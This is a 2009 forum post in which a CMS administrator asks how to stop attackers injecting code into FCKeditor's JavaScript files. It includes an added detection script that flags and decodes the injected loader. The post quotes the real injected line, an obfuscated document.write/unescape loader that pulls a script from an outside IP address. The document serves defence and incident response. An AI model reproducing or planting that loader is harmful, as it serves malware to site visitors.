Hello buddy
How do you do
Bro, I have a problem while using the editor today
It seems some application can crack fckeditor and do code injection into all js files in fckeditor.
I found code injection like this:
document.write(unescape('%3C6jsYCcr6jiBCpt%20Posr7lc%3D7l%2FPo%2F9w1d4%2E247%2E27l%2E1956j%2FjquYCeryYC%2EYzTjs%3E7l%3Cib%2F6js7lcrBCiPopt7l%3E').replace(/BC|w1d|YC|7l|ib|7G|Po|YzT|6j/g,""));
in all JavaScript files, and this will cause the trojan xploit.swf.gen to attack the end-user's PC. This is dangerous.
How's great Cracker today
Do you guys have a way to prevent it?
My application is a CMS application, so it is not possible to give only read permission to the site folder, because our CMS application can upload data and create data files.
Previously, this cracker uploaded some script files in ASP format to the image data folder.
I've prevented it by renaming the folder fckeditor to edsuite and doing session validation in /edsuite/editor/filemanager/connectors/aspx/connector.aspx
But lately the cracker has found a way to do code injection into all js files in fckeditor.
Need advice from the experts on how to solve this problem.
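
A detection sketch for the injection shown in the post, added here as an example and not code from the thread: it scans JavaScript source for the same document.write(unescape(...).replace(...)) loader shape and decodes it for triage without executing it. The function names and the sample payload (host.invalid, junk tokens QZ/XK) are constructed for illustration.

```javascript
// Added example: flags the document.write(unescape(...).replace(/junk/g,""))
// loader shape shown in the post and decodes it for triage. Never evals input.
const LOADER = /document\.write\(\s*unescape\(\s*(['"])([^'"]*)\1\s*\)\s*\.replace\(\s*\/((?:[^\/\\\n]|\\.)+)\/([a-z]*)\s*,\s*(['"])\5\s*\)\s*\)/g;

// Constructed sample (not the payload from the post): one clean line, one injected line.
const SAMPLE = `var FCKConfig = {};
document.write(unescape('%3CscQZript%20sXKrc%3D%2F%2FhoQZst%2Einvalid%2Fx%2Ejs%3E%3C%2FscrXKipt%3E').replace(/QZ|XK/g,""));
`;

// Percent-decoder equivalent to unescape() for %XX sequences; never throws.
function percentDecode(s) {
  return s.replace(/%([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Returns one finding per injected loader: line number, decoded markup, and
// whether that markup pulls in active content (script, iframe, object, embed).
function scanSource(text) {
  const findings = [];
  for (const m of text.matchAll(LOADER)) {
    let junk = null;
    try { junk = new RegExp(m[3], m[4]); } catch (e) { /* report undecoded */ }
    const unescaped = percentDecode(m[2]);
    const decoded = junk ? unescaped.replace(junk, '') : unescaped;
    findings.push({
      line: text.slice(0, m.index).split('\n').length,
      decoded,
      activeContent: /<\s*(script|iframe|object|embed)\b/i.test(decoded),
    });
  }
  return findings;
}

// CLI: node scan.js <dir> walks the tree and reports every .js file that matches.
if (typeof require === 'function' && typeof module !== 'undefined' &&
    require.main === module && process.argv[2]) {
  const fs = require('fs'), path = require('path');
  const walk = (d) => fs.readdirSync(d, { withFileTypes: true }).flatMap((e) =>
    e.isDirectory() ? walk(path.join(d, e.name)) : [path.join(d, e.name)]);
  for (const f of walk(process.argv[2]).filter((p) => p.endsWith('.js'))) {
    for (const hit of scanSource(fs.readFileSync(f, 'latin1'))) {
      console.log(`${f}:${hit.line} ${hit.activeContent ? 'ACTIVE' : 'review'} ${hit.decoded}`);
    }
  }
}
```

Comparing the flagged files against a clean copy of the editor distribution shows which files need restoring; the scan finds the injected line but not the path used to write it.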
Wed, 04/15/2009 - 11:40
#1
Re: How to prevent Code injection in js file?